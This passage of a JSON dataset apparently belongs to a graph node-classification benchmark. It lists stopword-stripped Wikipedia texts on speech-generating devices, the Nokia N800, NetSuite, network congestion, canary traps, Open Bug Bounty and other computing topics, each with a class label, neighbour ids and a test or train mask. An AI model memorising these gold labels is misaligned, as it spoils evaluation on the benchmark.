specialists saw benefit using sgds adults children well neuro-linguists found sgds effective helping children risk temporary language deficits undergoing brain surgery patients als particular digitized sgds used communication aids pediatric patients recovery process many methods accessing messages devices directly indirectly specialized access devices direct access methods involve physical contact system using keyboard touch screen users accessing sgds indirectly specialized devices must manipulate object order access system maneuvering joystick head mouse optical head pointer light pointer infrared pointer switch access scanner specific access method depend skills abilities user direct selection body part pointer adapted mouse joystick eye tracking could used whereas switch access scanning often used indirect selection unlike direct selection e.g. typing keyboard touching screen users target scanning make selections scanning indicator cursor electronic device desired choice unable point typically calibrate eyes use eye gaze way point blocking way select desired words phrases speed pattern scanning well way items selected individualized physical visual cognitive capabilities user augmentative alternative communication typically much slower speech users generally producing 8–10 words per minute rate enhancement strategies increase user rate output around 12–15 words per minute result enhance efficiency communication given sgd may large number vocal expressions facilitate efficient effective communication including greetings expressing desires asking questions sgds multiple pages symbols accommodate large number vocal expressions thus portion symbols available visible one time communicator navigating various pages speech-generating devices generally display set selections either using dynamically changing screen fixed display two main options increasing rate communication sgd encoding prediction encoding permits user produce word sentence phrase using one two activations sgd iconic encoding strategies semantic compaction combine sequences icons picture symbols produce words phrases numeric alpha-numeric letter encoding also known abbreviation-expansion words sentences coded sequences letters numbers example typing hh g1 greeting 1 may retrieve hello prediction rate enhancement strategy sgd attempts reduce number keystrokes used predicting word phrase written user user select correct prediction without needing write entire word word prediction software may determine choices offered based frequency language association words past choices user grammatical suitability however users shown produce words per minute using scanning interface static keyboard layout predictive grid layout suggesting cognitive overhead reviewing new arrangement cancels benefits predictive layout using scanning interface another approach rate-enhancement dasher uses language models arithmetic coding present alternative letter targets screen size relative likelihood given history rate words produced depend greatly conceptual level system talk system allows users choose large numbers sentence-level utterances demonstrated output rates excess 60 wpm fixed display devices refer symbols items fixed particular format sources refer static displays display devices simpler learning curve devices fixed display devices replicate typical arrangement low-tech aac devices low-tech defined devices need batteries electricity electronics like communication boards share disadvantages example typically restricted limited number symbols hence messages important note technological advances made twenty-first century fixed-display sgds commonly used anymore dynamic displays devices usually also touchscreen devices typically generate electronically produced visual symbols pressed change set selections displayed user change symbols available using page links navigate appropriate pages vocabulary messages home page dynamic display device may show symbols related many different contexts conversational topics pressing one symbols may open different screen messages related topic example watching volleyball game user may press sport symbol open page messages relating sport press symbol showing scoreboard utter phrase score advantages dynamic display devices include availability much larger vocabulary ability see sentence construction advantage dynamic display devices underlying operating system capable providing options multiple communication channels including cell phone text messaging e-mail work linköping university shown email writing practices allowed children sgd users develop new social skills increase social participation low cost systems also include keyboard audio speaker combination without dynamic display visual screen type keyboard sends typed text direct audio speaker permit phrase spoken without need visual screen always required one simple benefit talking keyboard used standard telephone speakerphone enable voice impaired individual 2 way conversation telephone output sgd may digitized and/or synthesized digitized systems play directly recorded words phrases synthesized speech uses text-to-speech software carry less emotional information permits user speak novel messages typing new words today individuals use combination recorded messages text-to-speech techniques sgds however devices limited one type output words phrases entire messages digitised stored onto device playback activated user process formally known voice banking advantages recorded speech include provides natural prosody speech naturalness listener e.g. person age gender aac user selected record messages b provides additional sounds may important user laughing whistling moreover digitized sgds provide degree normalcy patient families lose ability speak major disadvantage using recorded speech users unable produce novel messages limited messages pre-recorded device depending device may limit length recordings sgds use synthesized speech apply phonetic rules language translate user message voice output speech synthesis users freedom create novel words messages limited pre-recorded device others smartphones computers increased use synthesized speech devices creation apps allow user select list phrases messages spoken voice language user chosen apps speakit assistive express iphone provide cheap way use speech-generating device without visit doctor office learn use specialized machinery synthesized sgds may allow multiple methods message creation used individually combination messages created letters words phrases sentences pictures symbols synthesized speech virtually unlimited storage capacity messages demands memory space synthesized speech engines available many languages engine parameters speech rate pitch range gender stress patterns pauses pronunciation exceptions manipulated user selection set sgd set messages symbols codes available person using device content organisation updating selection set areas active research influenced number factors including user ability interests age selection set aac system may include words user know yet – included user grow content installed given sgd may include large number preset pages provided manufacturer number additional pages produced user user care team depending user needs contexts device used researchers beukelman mirenda list number possible sources family members friends teachers care staff selection initial content sgd range sources required general one individual would knowledge experience generate vocal expressions needed given environment example parents therapists might think add slang terms innit previous work analyzed vocabulary use typically developing speakers word use aac users generate content new aac devices processes work well generating core set utterances vocal expressions less effective situations particular vocabulary needed example terms related directly user interest horse riding term fringe vocabulary refers vocabulary specific unique individual personal interests needs typical technique develop fringe vocabulary device conduct interviews multiple informants siblings parents teachers co-workers involved persons researchers musselwhite st. louis suggest initial vocabulary items high interest user frequently applicable range meanings pragmatic functionality criteria widely used aac field ecological check sgd content beukelman mirenda emphasize vocabulary selection also involves ongoing vocabulary maintenance however difficulty aac users carers must program new utterances manually e.g names new friends personal stories existing commercial solutions automatically adding content number research approaches attempted overcome difficulty range inferred input generating content based log conversation user friends family data mined internet find language materials webcrawler project moreover making use lifelogging based approaches device content changed based events occur user day accessing user data high-quality messages generated risk exposing sensitive user data example making use global positioning systems device content changed based geographical location many recently developed sgds include performance measurement analysis tools help monitor content used individual raises concerns privacy argue device user involved decision monitor use way similar concerns raised regarding proposals devices automatic content generation privacy increasingly factor design sgds aac devices designed used areas user life sensitive legal social technical issues centred wide family personal data management problems found contexts aac use example sgds may designed support user right delete logs conversations content added automatically programming dynamic speech generating devices usually done augmentative communication specialists specialists required cater needs patients patients usually choose kinds words/ phrases want example patients use different phrases based age disability interests etc therefore content organization extremely time consuming additionally sgds rarely covered health insurance companies result resources limited regards funding staffing dr. john costello boston children hospital driving force soliciting donations keep program running well-staffed within hospital hospitals across country",
    "neighbors": [
      3533
    ],
    "mask": "Test"
  },
  {
    "node_id": 1537,
    "label": 2,
    "text": "Nokia_N800:nokia n800 nokia n800 internet tablet wireless internet appliance nokia originally announced las vegas ces 2007 summit january 2007 n800 allows user browse internet communicate using wi-fi networks mobile phone via bluetooth n800 developed successor nokia 770 includes fm internet radio rss news reader image viewer media player audio video files note usb port uses mini-b socket instead mini-ab specially grounded adaptor required make full use usb otg client/host auto-switching switching done software regular adaptors though usb otg provides 100 current versus full-size usb 500 devices larger current requirements need used powered usb hub n800 like nokia internet tablets runs maemo similar many handheld operating systems provides home screen—the central point applications settings accessed home screen divided areas launching applications menu bar large customisable area display information rss reader internet radio player google search box example maemo modified version debian n800 bundled several applications including mozilla-based microb browser macromedia flash gizmo skype n800 use maemo os comes number built-in applications additional applications installed number sources including various official community",
    "neighbors": [
      3585,
      529,
      10770,
      5143,
      2072,
      5659,
      6178,
      4132,
      40,
      3626,
      9266,
      10802,
      7220,
      5175,
      10820,
      6216,
      11337,
      9292,
      7246,
      1615,
      5199,
      5201,
      7253,
      5211,
      6748,
      1633,
      109,
      2179,
      3205,
      9359,
      1682,
      10393,
      5274,
      669,
      6310,
      167,
      5290,
      10410,
      7866,
      1728,
      4291,
      7877,
      199,
      4305,
      6870,
      5339,
      2784,
      9443,
      3300,
      4324,
      7399,
      8423,
      2285,
      1776,
      8433,
      2308,
      8472,
      11545,
      7983,
      821,
      1849,
      7492,
      10053,
      3911,
      6996,
      854,
      10583,
      10599,
      6505,
      9581,
      5998,
      10606,
      2420,
      10109,
      8577,
      11655,
      1424,
      2449,
      8083,
      405,
      7063,
      5019,
      4003,
      7617,
      967,
      9163,
      6618,
      5095,
      1533
    ],
    "mask": "Test"
  },
  {
    "node_id": 1538,
    "label": 1,
    "text": "Soterml:soterml soterml soil terrain markup language xml-based markup language storing exchanging soil terrain related data soterml development done within e-soter platform geoss plans global earth observation system within framework e-soter project addresses felt need global soil terrain database centre geospatial science currently nottingham gepospatial institute university nottingham initiated development since january 2009 development maintenance currently handled national soil resources institurte nsri cranfield university uk role cgs within development e-soter dissemination platform based inspire principles soterml development included 1 development data dictionary nomenclatures various data sources data metadata 2 development exchange format/procedures world reference base 2006",
    "neighbors": [],
    "mask": "Test"
  },
  {
    "node_id": 1539,
    "label": 7,
    "text": "NetSuite:netsuite netsuite founded 1998 evan goldberg original name netledger offered web-hosted accounting software oracle licensed software banner oracle small business suite short time cancellation netsuite widely seen first cloud computing software company company ’ 1999 founding pre-dating salesforce.com month goldberg chairman chief technology officer oracle acquisition july 2002 zach nelson appointed ceo prior joining netsuite nelson ran early provider business applications internet called mycio.com division mcafee corp experience led belief software would delivered internet left mcafee join netsuite led company 1 million revenue billion-dollar run-rate prior acquisition oracle corp. january 4 2007 netsuite named moneyball general manager billy beane major league baseball oakland board directors evan goldberg cited beane ability combine facts instinct important factor decision involve company netsuite became publicly traded company initial public offering ipo 6.2 million shares new york stock exchange december 2007 one quarter employees based philippine office netsuite additional offices denver las vegas austin chicago atlanta new york city boston toronto united kingdom spain czech republic hong kong singapore australia uruguay 1998 evan goldberg received approximately 125 million initial financial backing larry ellison founder chief executive officer oracle corporation ellison venture capital entity tako ventures initial investors starvest partners adp ubs painewebber netsuite software also relies database software licensed oracle ellison family members owned approximately 47.4 netsuite common stock december 31 2014 firm 10-q filing march 2 2015 stated mr. ellison able exercise control approval significant corporate transactions including change control liquidation july 28 2016 oracle announced offered purchase netsuite 9.3 billion deal faced intense scrutiny oracle founder larry ellison owned nearly 40 netsuite conflict interest led board companies establish independent committees review deal perspective independent shareholders major netsuite shareholders t. rowe notified oracle would tendering shares current terms proposed deal early october 2016 oracle extended deadline shareholders netsuite tender shares november 4 deal closed nov. 7 netsuite offers four main software solutions optional implementation support services",
    "neighbors": [
      4236,
      10509,
      10893,
      911,
      1680,
      1935,
      4623,
      8592,
      2965,
      2328,
      4377,
      8986,
      8353,
      8994,
      6307,
      9766,
      5159,
      8871,
      7721,
      1707,
      6444,
      5677,
      8495,
      3121,
      9010,
      9012,
      7352,
      10553,
      1594,
      2496,
      4289,
      6338,
      7489,
      9665,
      6341,
      1224,
      6729,
      8520,
      1612,
      4429,
      79,
      2768,
      7248,
      1362,
      467,
      9682,
      597,
      1755,
      6107,
      2269,
      6367,
      1250,
      4194,
      5732,
      10340,
      11646,
      5224,
      11113,
      10090,
      3819,
      7532,
      7660,
      7022,
      1008,
      8434,
      1399,
      2170,
      5499,
      253,
      8446
    ],
    "mask": "None"
  },
  {
    "node_id": 1540,
    "label": 4,
    "text": "Matt_Suiche:matt suiche matthieu suiche born september 22 1988 also known matt handle msuiche french hacker entrepreneur widely known founder moonsols co-founder cloudvolumes acquired vmware 2014 march 2014 suiche highlighted one 100 key french developers report french minister fleur pellerin suiche best known work memory forensics computer security fields notable research contributions include windows hibernation file analysis mac os x physical memory analysis furthermore created livecloudkd utility analyze running microsoft hyper-v virtual machines microsoft technical fellow mark russinovich highlighted blog introducing similar feature one microsoft tools russinovich also said impressed invited matthieu speak live kernel debugging livecloudkd year ’ bluehat security briefings also known discovered multiple security flaws multiple microsoft windows kernel components suiche microsoft valuable professional enterprise security suiche started career independent security researcher presenting work microsoft windows hibernation file first time international conference pacsec held tokyo 2007 also invited europol speak internal high tech crime experts meeting 2008 2009 2010 worked researcher netherlands forensic institute hague starting moonsols specialized memory forensics incident response suiche also contributor samba project google summer code 2008 charge implementing new compression algorithms used networking protocols 2011 suiche founded cloudvolumes formerly snapvolumes california-based virtualization management product company served chief scientist suiche also frequent speaker various computer security conferences black hat briefings microsoft blue hat hacker conference shakacon hackito ergo sum europol high tech crime experts meeting cansecwest pacsec hack box syscan shakacon board program committee shakacon security conference one founders hackito ergo sum security conference paris 2012 suiche one security researchers along several well-known security researchers submitted bogus article entitled nmap internet considered harmful darpa inference checking kludge scanning hakin9 information security magazine article used social proof demonstrate lack relevance expertise certain media dedicated information security also criticize spamming techniques used media order generate quantity-oriented data rather quality-oriented information following year article resulted awarded 2013 pwnie awards attributed hakin9 epic fail category",
    "neighbors": [
      161,
      2275,
      3109,
      5363,
      1525,
      7605,
      9655,
      7449,
      9051,
      4956,
      2558,
      9375
    ],
    "mask": "None"
  },
  {
    "node_id": 1541,
    "label": 5,
    "text": "Network_congestion:network congestion network congestion data networking queueing theory reduced quality service occurs network node link carrying data handle typical effects include queueing delay packet loss blocking new connections consequence congestion incremental increase offered load leads either small increase even decrease network throughput network protocols use aggressive retransmissions compensate packet loss due congestion increase congestion even initial load reduced level would normally induced network congestion networks exhibit two stable states level load stable state low throughput known congestive collapse networks use congestion control congestion avoidance techniques try avoid collapse include exponential backoff protocols csma/ca 802.11 similar csma/cd original ethernet window reduction tcp fair queueing devices routers network switches techniques address congestion include priority schemes transmit packets higher priority ahead others explicit allocation network resources specific flows use admission control network resources limited including router processing time link throughput resource contention may occur networks number common circumstances wireless lan easily filled single personal computer even fast computer networks backbone easily congested servers client pcs denial-of-service attacks botnets capable filling even largest internet backbone network links generating large-scale network congestion telephone networks mass call event overwhelm digital telephone circuits congestive collapse congestion collapse condition congestion prevents limits useful communication congestion collapse generally occurs choke points network incoming traffic exceeds outgoing bandwidth connection points local area network wide area network common choke points network condition settles stable state traffic demand high little useful throughput available packet delay loss occur quality service extremely poor congestive collapse identified possible problem 1984 first observed early internet october 1986 nsfnet phase-i backbone dropped three orders magnitude capacity 32 kbit/s 40 bit/s continued end nodes started implementing van jacobson congestion control 1987 1988 packets sent could handled intermediate routers intermediate routers discarded many packets expecting end points network retransmit information however early tcp implementations poor retransmission behavior packet loss occurred endpoints sent extra packets repeated information lost doubling incoming rate congestion control modulates traffic entry telecommunications network order avoid congestive collapse resulting oversubscription typically accomplished reducing rate packets whereas congestion control prevents senders overwhelming network flow control prevents sender overwhelming receiver theory congestion control pioneered frank kelly applied microeconomic theory convex optimization theory describe individuals controlling rates interact achieve optimal network-wide rate allocation examples optimal rate allocation max-min fair allocation kelly suggestion proportionally fair allocation although many others possible let formula_1 rate flow formula_2 formula_3 capacity link formula_4 formula_5 1 flow formula_2 uses link formula_4 0 otherwise let formula_8 formula_9 formula_10 corresponding vectors matrix let formula_11 increasing strictly concave function called utility measures much benefit user obtains transmitting rate formula_8 optimal rate allocation satisfies lagrange dual problem decouples flow sets rate based price signalled network link capacity imposes constraint gives rise lagrange multiplier formula_15 sum multipliers formula_16 price flow responds congestion control becomes distributed optimisation algorithm many current congestion control algorithms modelled framework formula_15 either loss probability queueing delay link formula_4 major weakness assigns price flows sliding window flow control causes burstiness causes different flows observe different loss delay given link among ways classify congestion control algorithms mechanisms invented prevent network congestion deal network collapse correct endpoint behavior usually repeat dropped information progressively slow repetition rate provided endpoints congestion lifts network resumes normal behavior strategies slow-start ensure new connections n't overwhelm router congestion detection initiates common router congestion avoidance mechanisms include fair queuing scheduling algorithms random early detection red packets randomly dropped congestion detected proactively triggers endpoints slow transmission congestion collapse occurs fair queuing useful routers choke points small number connections passing larger routers must rely red end-to-end protocols designed behave well congested conditions tcp well known example first tcp implementations handle congestion described 1984 van jacobson inclusion open source solution berkeley standard distribution unix bsd 1988 first provided good behavior udp control congestion protocols built atop udp must handle congestion independently protocols transmit fixed rate independent congestion problematic real-time streaming protocols including many voice ip protocols property thus special measures quality service must taken keep packets dropped presence congestion general congestion pure datagram networks must kept periphery network mechanisms handle congestion internet backbone problematic cheap fiber-optic lines reduced costs internet backbone allowing provisioned enough bandwidth keep congestion periphery connection-oriented protocols widely used tcp protocol generally watch packet errors losses delays see quality service adjust transmit speed various network congestion avoidance processes support different trade-offs tcp congestion avoidance algorithm primary basis congestion control internet problems occur concurrent tcp flows experience port queue buffer tail-drops defeating tcp automatic congestion avoidance flows experience port queue buffer tail-drop begin tcp retrain moment – called tcp global synchronization active queue management aqm reorder drop network packets inside transmit buffer associated network interface controller nic task performed network scheduler one solution use random early detection red network equipment port queue buffer network equipment ports one queue buffer weighted random early detection wred could used available red indirectly signals sender receiver deleting packets e.g average queue buffer lengths threshold e.g 50 deletes linearly cubically packets e.g 100 average queue buffer lengths computed 1 second intervals robust random early detection rred algorithm proposed improve tcp throughput denial-of-service dos attacks particularly low-rate denial-of-service ldos attacks experiments confirmed red-like algorithms vulnerable low-rate denial-of-service ldos attacks due oscillating tcp queue size caused attacks network equipment equipped ports follow measure flow flowbased-red/wred thereby able signal big bandwidth flow according quality service policy policy could divide bandwidth among flows criteria another approach use ip explicit congestion notification ecn ecn used two hosts signal want use method protocol bit used signal explicit congestion better indirect packet delete congestion notification performed red/wred algorithms requires explicit support hosts ecn coauthor sally floyd published detailed information ecn including version required cisco ios router receives packet marked ecn-capable anticipates using red congestion sets ecn flag notifying sender congestion sender respond decreasing transmission bandwidth e.g. decreasing tcp window size sending rate means cisco systems engine iv v capability classify flows aggressive bad adaptive good ensures flows fill port queues dbl utilize ip ecn instead packet-delete-signalling congestion avoidance achieved efficiently reducing traffic application requests large file graphic web page usually advertises window 32k 64k results server sending full window data assuming file larger window many applications simultaneously request downloads data creates congestion point upstream provider flooding queue using device reduce window advertisement remote servers send less data thus reducing congestion technique reduce network congestion factor 40 backward ecn becn another proposed congestion mechanism uses icmp source quench messages ip signalling mechanism implement basic ecn mechanism ip networks keeping congestion notifications ip level requiring negotiation network endpoints effective congestion notifications propagated transport layer protocols tcp udp appropriate adjustments protocols avoid congestive collapse often based idea data loss caused congestion true nearly cases errors transmission rare however causes wifi 3g networks radio layer poor throughput cases since wireless networks susceptible data loss due interference tcp connections running radio based physical layer see data loss tend erroneously believe congestion occurring slow-start protocol performs badly short connections older web browsers created many short-lived connections opened closed connection file kept connections slow start mode slowed response times avoid problem modern browsers either open multiple connections simultaneously reuse one connection files requested particular server initial performance poor many connections never get slow-start regime significantly increasing latency admission control requires devices receive permission establishing new network connections new connection risks creating congestion permission denied one example use contention-free transmission opportunities cftxops itu-t g.hn standard provides high-speed 1 gbit/s local area networking varying wires power lines phone lines coaxial cables",
    "neighbors": [
      5,
      3725,
      4883,
      11413,
      5402,
      5531,
      10924,
      3117,
      6834,
      2739,
      4918,
      5181,
      835,
      8391,
      10055,
      4691,
      1748,
      4692,
      3286,
      5469,
      3551,
      5472,
      2785,
      2659,
      3813,
      10344,
      2409,
      7017,
      8170,
      2799,
      2294,
      4095
    ],
    "mask": "Test"
  },
  {
    "node_id": 1542,
    "label": 2,
    "text": "Appearance_Manager:appearance manager appearance manager component mac os 8 mac os 9 controls overall look macintosh graphical user interface widgets supports several themes originally developed apple failed copland project cancellation project system moved newer versions mac os appearance manager also available free part downloadable sdk system 7 appearance manager implemented abstraction layer control manager quickdraw previously controls made direct quickdraw calls draw user interface elements buttons scrollbars window title bars etc appearance manager elements abstracted series apis draw item distinct entity behalf client code thus relieving control manager task extra level indirection allows system support concept switchable themes since client code simply requests image interface element button scroll bar example draws appearance kaleidoscope 3rd party application first utilize functionality via scheme files followed updated appearance control panel mac os 8.5 acted similarly via theme files schemes themes similar concept internally compatible updated powerful version appearance manager used carbon applications mac os x even apple made transition aqua extras.rsrc file updated version appearance theme compatible newer appearance manager mac os x version 10.3 'layo data longer used even carbon applications continued existence appearance manager longer confirmed default look feel appearance manager mac os 8 9 platinum intended primary gui copland platinum retains many shapes positions elements system 7 earlier like window control widgets buttons charcoal default system font chicago available via menu option however various shades grey used extensively throughout interface opposed previous interfaces mostly monochrome black white apple platinum theme however actually embedded appearance manager appearance control panel ability attach theme appearance manager apple platinum file themes folder system folder acts stub functional theme elements embedded customizable palettes 'clut resources used progress bars scroll thumbs slider tabs menu selections apple platinum unique option available real themes appearance control panel uses type code 'pltn identify file act like palette modification stub apple platinum type code 'thme identify file act like appearance theme important distinction appearance control panel implements themes appearance manager kaleidoscope third party software implements schemes appearance manager kaleidoscope substitute appearance manager substitute appearance control panel apple widely demonstrated two appearance themes override apple platinum hi-tech gizmo hi-tech based shades-of-black color scheme made interface look like contemporary piece audio-visual equipment gizmo kids interface using lots bright colors wiggly interface elements changed every single element overall gui leaving trace apple platinum third theme later introduced drawing board developed apple japan theme uses elements make interface look like drawn pencil drafting-board including small pencil marks around windows barely visible graph paper grid desktop squarish elements low contrast although none themes included released version mac os themes present pre-release versions mac os 8.5 removed without explanation final release one retrospective review long-time mac user described themes mistake waste engineering resources saying 'hi-tech theme 'looked like typical dark over-decorated techno skin became popular linux desktops 'gizmo looked 'awful ... finder clown suit default font called charcoal used replace similar chicago typeface used earlier versions mac os number additional system fonts also provided including capitals gadget sand techno textile order system font glyphs specific mac operating system need provided command key symbol ⌘ normally system fonts displayed 12 points later versions appearance manager also apply anti-aliasing type displayed screen certain size default improves overall look text reducing perception rasterization artifacts anti-aliasing adjustable appearance control panel shareware products exist provided features appearance manager offered directly appearance control panel church windows décor provide desktop picture functionality windowshade purchased apple bundled system 7 provides collapse functionality windows collapse “ roll ” leaving title bar kaleidoscope written arlo rose greg landweber applied schemes gui apple released update appearance control panel mac os 8.5 provides similar functionality using themes whereas handful themes ever developed thousands kaleidoscope schemes developed theme support appearance control panel first announced team responsible demonstrated automatic tool specifically designed convert tens thousands existing kaleidoscope scheme files appearance manager-compatible theme files tool released public however similar tool developed kaleidoscope remained primary theme platform even appearance control panel offered theme capabilities mac os 8.5 steve jobs returned apple release mac os 8.5 decided officially drop support themes wanted preserve consistent user interface apple released little documentation theme format withheld beta-released themes even issued cease desist notice authors third-party theme editor grounds intended allow users create themes imitate aqua interface mac os x time format kaleidoscope schemes continued evolve result kaleidoscope schemes proliferated appearance themes never really took kaleidoscope rendered obsolete transition mac os x kaleidoscope compatible",
    "neighbors": [
      2571,
      3598,
      5520,
      11037,
      6048,
      11171,
      8114,
      823,
      1592,
      576,
      713,
      9035,
      213,
      3167,
      9700,
      6377,
      2282,
      4844,
      5619,
      8441,
      7163,
      3324,
      4989
    ],
    "mask": "Validation"
  },
  {
    "node_id": 1543,
    "label": 3,
    "text": "Rasterscan:rasterscan rasterscan computer game published 1987 mastertronic several 8-bit formats written binary design ltd based parsonage gardens manchester c64 version programmed phillip allsopp aka 'sarge rasterscan large damaged spacecraft drifting uncontrollably towards nearby star rasterscan still controlled piloted safety droid called msb unfortunately msb also damaged without help repair toasters player needs control msb hopefully use save unfortunate spacecraft player controls msb spherical droid float interior ship directions msb interact craft machinery instruments serve purpose also needs solve logic-puzzles order open doors different puzzles door allow access parts spacecraft",
    "neighbors": [
      9006
    ],
    "mask": "Test"
  },
  {
    "node_id": 1544,
    "label": 4,
    "text": "Canary_trap:canary trap canary trap method exposing information leak giving different versions sensitive document several suspects seeing version gets leaked could one false statement see sensitive information gets people well special attention paid quality prose unique language hopes suspect repeat verbatim leak thereby identifying version document term coined tom clancy novel patriot games although clancy invent technique actual method usually referred barium meal test espionage circles used intelligence agencies many years fictional character jack ryan describes technique devised identifying sources leaked classified documents summary paragraph six different versions mixture paragraphs unique numbered copy paper thousand possible permutations ninety-six numbered copies actual document reason summary paragraphs lurid entice reporter quote verbatim public media quotes something two three paragraphs know copy saw therefore leaked refinement technique uses thesaurus program shuffle synonyms thus making every copy document unique following troubled production late 1970s paramount pictures effectively replaced gene roddenberry producer movies franchise harve bennett roddenberry retained executive consultant due high regard series fans held little real authority still kept involved creative process fans often complained particular plot developments proposed films death spock roddenberry opposed drafts screenplay circulated bennett arranged individual copy subtle clues distinguishing others shortly roddenberry opposed destruction enterprise climax film fans began complain paramount bennett found leaked copy script one given roddenberry unable anything series leaks tesla motors 2008 ceo elon musk reportedly sent slightly different versions e-mail employee attempt reveal potential leakers e-mail disguised request employees sign new non-disclosure agreement plan backfired company general counsel forwarded unique version e-mail attached agreement result musk scheme realized employees safe copy leak according book spycatcher peter wright published 1987 technique standard practice used mi5 intelligence agencies many years name barium meal test barium meal test sophisticated canary trap flexible may take many different forms however basic premise reveal secret suspected enemy nobody else monitor whether evidence fake information utilised side example double agent could offered tempting bait e.g told important information stored dead drop site fake dead drop site could periodically checked signs disturbance site showed signs disturbed instance order copy microfilm stored would confirm suspected enemy really enemy i.e double agent technique embedding significant information hidden form medium used many ways usually classified according intent",
    "neighbors": [
      7424,
      2305,
      5986,
      9256,
      9289,
      150
    ],
    "mask": "Test"
  },
  {
    "node_id": 1545,
    "label": 7,
    "text": "Jobvite:jobvite jobvite inc. san mateo california indianapolis indiana software recruiting corporation comprehensive recruiting platform accelerates recruiting easy-to-use ats social recruiting capabilities mobile-optimized branded career sites recruiting branding solution on-demand video screening advanced analytics on-boarding seamless integration hr systems software service saas social recruiting platforms enabling companies advertise jobs manage recruitment process much jobvite inc. established 2003 jesper schultz hans larsen name forumjobs inc company name changed jobvite 2006 december 2007 company raised 7.2 million venture funding cmea ventures july 2008 dan finnigan formerly yahoo hotjobs.com appointed ceo company finnigan hired two former colleagues yahoo engineering senior director adam hyder chief technology officer yahoo spot marketing head tim lambert chief revenue officer september 2010 jobvite formed partnership successfactors business execution bizx suite partnership added bizx suite 8 million plus users jobvite search platform october 2014 jobvite received 25 million investments new york city-based growth equity firm catalyst investors joined trident capital cmea capital ata ventures one firm ’ chief investors investment company amounted 55 million time august 2015 company launched operations london england 2019 company additional offices chicago boston bengaluru india february 2019 k1 investment management invested 200 million dollars jobvite part funds assisted jobvite ’ acquisition three companies talemetry rolepoint canvas acquisition resulted additional 2,000 customers jobvite including fortune 500 companies 2014 jobvite cited server 1600 global companies 46 million job seekers worldwide jobvite specializes provision software service saas recruiting platform web-based service enables clientele create job invitations known jobvites business associates employees social networking sites facebook linkedin making viable social recruiting provider companies post job openings manage recruitment process clientele include twitter linkedin schneider electric gamesys jobvite offers number features within recruiting platform include 2010 popular application “ work us ” roughly 5,000 active users every month time jobvite become known surveys social recruitment frequently cited source media outlets time inc. numerous authors books social human resource management",
    "neighbors": [
      8735
    ],
    "mask": "Test"
  },
  {
    "node_id": 1546,
    "label": 8,
    "text": "VlibTemplate:vlibtemplate vlibtemplate template engine written php programmers web developers may use web development vlibtemplate php class intended make splitting php html simple natural task using markup tags class allows users set values variables loops statements etc declared template vlibtemplate part vlib interface vlibdate vlibmimemail since vlibtemplate separates php html two files note file contains plain html one markup tag tmpl_var used display template variables assigned php script using vlibtemplatecache speed parsing process",
    "neighbors": [
      6850,
      8644,
      7022,
      8539,
      2556
    ],
    "mask": "Test"
  },
  {
    "node_id": 1547,
    "label": 4,
    "text": "Open_Bug_Bounty:open bug bounty open bug bounty non-profit bug bounty platform responsible disclosure platform allows independent security researchers report xss similar security vulnerabilities website discover using non-intrusive security testing techniques researchers may choose make details vulnerabilities public 90 days since vulnerability submission communicate website operators program expectation operators affected website reward researchers making reports unlike commercial bug bounty programs open bug bounty non-profit project require payment either researchers website operators bounty matter agreement researchers website operators heise.de identified potential website vehicle blackmailing website operators threat disclosing vulnerabilities bounty paid reported open bug bounty prohibits open bug bounty launched private security enthusiasts 2014 february 2017 recorded 100,000 vulnerabilities 35,000 fixed grew website xssposed archive cross-site scripting vulnerabilities february 2018 platform 100,000 fixed vulnerabilities using coordinated disclosure program based iso 29147 guidelines",
    "neighbors": [
      3619,
      4198,
      711
    ],
    "mask": "Train"
  },
  {
    "node_id": 1548,
    "label": 3,
    "text": "PowerPC_e500:powerpc e500 powerpc e500 32-bit microprocessor core freescale semiconductor core compatible older powerpc book e specification well power isa v.2.03 dual issue seven-stage pipeline fpus version 2 onwards 32/32 kib data instruction l1 caches 256 512 1024 kib l2 frontside cache speeds range 533 mhz 1.5 ghz core designed highly configurable meet specific needs embedded applications features like multi-core operation interface auxiliary application processing units apu e500 powers high-performance powerquicc iii system chip soc network processors share common naming scheme mpc85xx freescale new qoriq evolutionary step powerquicc iii also based e500 cores three versions e500 core namely original e500v1 e500v2 e500mc 64-bit evolution e500mc core called e5500 core introduced 2010 key improvements e500v2 e500v1 include freescale introduced e500mc qoriq family chips june 2008 e500mc following features powerquicc 85xx devices based e500v1 e500v2 cores e500v2 june 2008 freescale announced qoriq brand microprocessors based e500 family cores",
    "neighbors": [
      6914,
      7299,
      3844,
      4868,
      1158,
      3846,
      4743,
      6663,
      5642,
      3467,
      7302,
      1933,
      7305,
      6415,
      3472,
      4881,
      2073,
      7065,
      1563,
      1309,
      3493,
      6949,
      6311,
      8102,
      1321,
      9391,
      10543,
      4017,
      5297,
      11314,
      1461,
      11447,
      8120,
      8761,
      6715,
      9020,
      1725,
      1983,
      1985,
      10945,
      10180,
      3017,
      336,
      8530,
      3540,
      342,
      9302,
      3932,
      11613,
      6878,
      3936,
      10501,
      1635,
      8931,
      869,
      7269,
      10214,
      10985,
      9964,
      10734,
      8048,
      3185,
      10224,
      4211,
      5235,
      630,
      3319,
      7286,
      8058,
      8700
    ],
    "mask": "Test"
  },
  {
    "node_id": 1549,
    "label": 1,
    "text": "FileMaker_Pro:filemaker pro filemaker pro cross-platform relational database application claris international. subsidiary apple inc integrates database engine graphical user interface gui security features allowing users modify database dragging new elements layouts screens forms filemaker pro evolved dos application developed primarily apple macintosh released april 1985 since 1992 available microsoft windows classic mac os macos used cross-platform environment filemaker server briefly ran linux linux support abandoned filemaker 7 thereafter running windows macos servers client version released ios devices july 2010 available desktop server ios web-delivery configurations 2016 filemaker cloud introduced including linux server centos offered exclusively amazon marketplace filemaker pro began ms-dos-based computer program named nutshell – developed nashoba systems concord massachusetts early 1980s nutshell distributed leading edge electronics marketer recently started selling ibm pc-compatible computers introduction macintosh nashoba combined basic data engine new forms-based graphical user interface gui leading edge interested newer versions preferring remain dos-only vendor kept nutshell name nashoba found another distributor forethought inc. introduced program macintosh platform filemaker apple introduced macintosh plus 1986 next version filemaker named filemaker plus reflect new model name forethought purchased microsoft introducing powerpoint product became part microsoft office microsoft introduced database application microsoft file shortly filemaker outsold filemaker therefore microsoft file discontinued microsoft negotiated nashoba right publish filemaker nashoba decided self-publish next version filemaker 4 shortly thereafter apple computer formed claris wholly owned subsidiary market software claris purchased nashoba round software suite leading edge nutshell faded marketplace competition dos- later windows-platform database products filemaker however continued succeed macintosh platform claris changed product name filemaker ii conform naming scheme products macwrite ii product changed little last nashoba version several minor versions followed succeeded filemaker pro 1.0 1990 september 1992 claris released cross-platform version mac windows except platform-specific functions program features user interface point filemaker real relational capabilities limited automatically looking importing values files ability save state—a filter sort layout data version 3.0 released around 1995 introduced new relational scripting features 1995 filemaker pro strong-selling product claris lineup 1998 apple moved development claris products 